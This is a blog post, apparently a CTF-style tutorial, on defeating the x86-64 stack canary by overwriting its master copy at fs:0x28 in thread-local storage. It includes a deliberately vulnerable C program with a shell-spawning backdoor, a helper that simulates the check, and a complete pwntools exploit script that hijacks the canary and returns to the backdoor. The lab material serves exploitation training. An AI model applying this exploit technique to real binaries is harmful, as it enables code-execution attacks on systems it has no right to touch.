Canary: hijacking the canary in TLS

Chiu

Overwriting the canary's master copy

On x86-64 Linux the fs segment register points to the current thread's TLS control block (glibc's tcbhead_t; it has nothing to do with the stack itself), and fs:0x28 is the stack_guard field inside that block, the master copy of the canary (on i386 the same field is at gs:0x14). A stack-protected function copies fs:0x28 into its frame in the prologue and, in the epilogue, compares the frame copy against fs:0x28 again; __stack_chk_fail fires only when the two disagree. The check therefore never verifies that the canary is secret, only that both copies match. If an arbitrary write can reach the master copy in TLS, the attacker sets it to a value of their choosing, then overflows the stack and places that same value in the canary slot, and the epilogue check passes. Two practical caveats: the TLS write has to happen after the vulnerable function has already loaded its copy and before it returns, and any other protected frame that was entered before the write and returns normally after it will fail its own check, so the hijacked return should lead somewhere that never returns (a backdoor that calls system, a ROP chain that exits). The distance from the write primitive to fs:0x28 is environment-specific; with the binary built with -g, break inside the vulnerable function in gdb and compute it with p/x ($fs_base + 0x28) - (long)heapbuf.

Example program:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

// Exploit target: it never returns, so no outer frame re-checks its canary.
void backdoor() {
    puts("this is backdoor.");
    system("/bin/sh");
}

void vuln() {
    // 0x80000 bytes is above glibc's default mmap threshold (128 KiB), so this
    // chunk comes from mmap and sits at a fixed distance (for a given libc and
    // loader) from the mapping that holds the main thread's TLS.
    char *heapbuf = malloc(0x80000);
    char stackbuf[0x100];
    size_t offset, length;
    puts("offset:");
    scanf("%zd", &offset);
    puts("length:");
    scanf("%zd", &length);
    puts("heapbuf:");
    // Relative arbitrary write: offset is chosen so heapbuf + offset == fs:0x28.
    read(0, heapbuf + offset, length);
    puts("stackbuf:");
    // Plain stack overflow: 0x200 bytes into a 0x100 buffer, past the canary,
    // saved rbp and return address.
    read(0, stackbuf, 0x200);
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    vuln();

    return 0;
}

// gcc pwn.c -o pwn -no-pie -g   (distro gcc enables -fstack-protector-strong by default)
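The following helper is an added example, not part of the original post or the author's exploit. It reads the thread pointer (fs:0) and the master canary (fs:0x28) directly, computes the heapbuf-to-fs:0x28 distance that the vulnerable program asks for as "offset", and replays the prologue/epilogue logic of a protected frame to show that an overflow alone fails the check while the TLS hijack plus the same overflow passes it. Everything is x86-64 Linux specific; the struct frame layout and the 'b'*8 fake value are modelling assumptions taken from the exploit, and the offset it prints is for this process, not for ./pwn (measure that one in gdb).

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* x86-64 Linux only: fs:0 holds the thread pointer (address of the TLS control
 * block) and fs:0x28 holds tcbhead_t.stack_guard, the master canary.
 * All three helpers are forced inline so that, even under -fstack-protector-all,
 * no separate frame loads one canary value and checks against another. */
static inline __attribute__((always_inline)) uintptr_t tls_base(void)
{
    uintptr_t v;
    __asm__ volatile("mov %%fs:0, %0" : "=r"(v) : : "memory");
    return v;
}

static inline __attribute__((always_inline)) uintptr_t tls_canary(void)
{
    uintptr_t v;
    __asm__ volatile("mov %%fs:0x28, %0" : "=r"(v) : : "memory");
    return v;
}

static inline __attribute__((always_inline)) void set_tls_canary(uintptr_t v)
{
    __asm__ volatile("mov %0, %%fs:0x28" : : "r"(v) : "memory");
}

/* The "offset" the vulnerable program asks for: distance from heapbuf to
 * fs:0x28. Stable for a given libc/loader even under ASLR because both the
 * mmap'd chunk and the TLS block are placed relative to the same mappings. */
static ptrdiff_t canary_offset_from(const void *heapbuf)
{
    return (ptrdiff_t)(tls_base() + 0x28 - (uintptr_t)heapbuf);
}

/* Model of a protected frame (assumption): a buffer followed by the canary slot. */
struct frame {
    char buf[0x100];
    uintptr_t canary_slot;
};

/* Replays vuln(): the prologue copies fs:0x28 into the frame, the attacker
 * optionally rewrites fs:0x28 (the heapbuf + offset write), then overflows the
 * buffer with a payload ending in attacker_value, and the epilogue compares the
 * frame copy with fs:0x28 again. Returns 1 if the check passes, 0 if
 * __stack_chk_fail would be reached. The real master canary is restored before
 * returning so the rest of this process keeps a consistent value. */
static int epilogue_check_passes(int overwrite_tls, uintptr_t attacker_value)
{
    uintptr_t saved = tls_canary();
    struct frame f;
    unsigned char payload[sizeof f];

    f.canary_slot = tls_canary();                 /* prologue: mov rax, fs:0x28 */
    if (overwrite_tls)
        set_tls_canary(attacker_value);           /* write through heapbuf + offset */

    memset(payload, 'a', sizeof f.buf);           /* 'a' * 0x100 up to the slot */
    memcpy(payload + sizeof f.buf, &attacker_value, sizeof attacker_value);
    memcpy(&f, payload, sizeof payload);          /* read(0, stackbuf, ...) overflow */

    int ok = (f.canary_slot == tls_canary());     /* epilogue: cmp slot, fs:0x28 */
    set_tls_canary(saved);
    return ok;
}

int main(void)
{
    void *heapbuf = malloc(0x80000);              /* same size as in pwn.c */
    uintptr_t fake = 0x6262626262626262ULL;       /* 'b' * 8 from the exploit */

    printf("fs:0x28 = %#lx (glibc zeroes the lowest byte)\n", (unsigned long)tls_canary());
    printf("offset heapbuf -> fs:0x28 = %td\n", canary_offset_from(heapbuf));
    printf("stack overflow only:   %s\n", epilogue_check_passes(0, fake) ? "passes" : "__stack_chk_fail");
    printf("TLS hijack + overflow: %s\n", epilogue_check_passes(1, fake) ? "passes" : "__stack_chk_fail");
    free(heapbuf);
    return 0;
}
```

Build with gcc -o tls_canary tls_canary.c and run it. The lowest byte of the value at fs:0x28 is zero (glibc clears it so string functions cannot copy the canary past its first byte), which is also why an overflow with 'b'*8 can never match the real canary by accident. To get the offset for the actual target, break inside vuln() in gdb and compare $fs_base + 0x28 with heapbuf; the 0x274558 used below is the author's value for their environment.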

exp:

from pwn import *

elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
p = process([elf.path])
# gdb.attach(p, "b *0x4012c5\nc")
# pause()

# Distance from heapbuf (an mmap'd chunk, since 0x80000 exceeds the mmap
# threshold) to fs:0x28, the stack_guard field of the main thread's TLS.
# Environment-specific: recompute it in gdb for your libc/loader.
p.sendlineafter(b"offset:", str(0x274558).encode())
p.sendlineafter(b"length:", b"8")

# Overwrite the master canary in TLS with a known value.
p.sendafter(b"heapbuf:", b'b' * 8)

payload = b"a" * 0x108          # stackbuf plus the locals up to the canary slot
payload += b'b' * 8             # canary: must equal the value just written to fs:0x28
payload += b'c' * 8             # saved rbp
# Single 'ret' gadget keeps rsp 16-byte aligned before system() in backdoor().
payload += p64(next(elf.search(asm('ret'), executable=True)))
payload += p64(elf.sym['backdoor'])
p.sendafter(b"stackbuf:", payload)

p.interactive()
  • Title: Canary--劫持tls上的canary
  • Author: Chiu
  • Created at : 2024-07-31 13:57:37
  • Updated at : 2024-07-31 13:58:09
  • Link: https://github.com/Idealist17/github.io/2024/07/31/Canary-劫持tls上的canary/
  • License: This work is licensed under CC BY-NC-SA 4.0.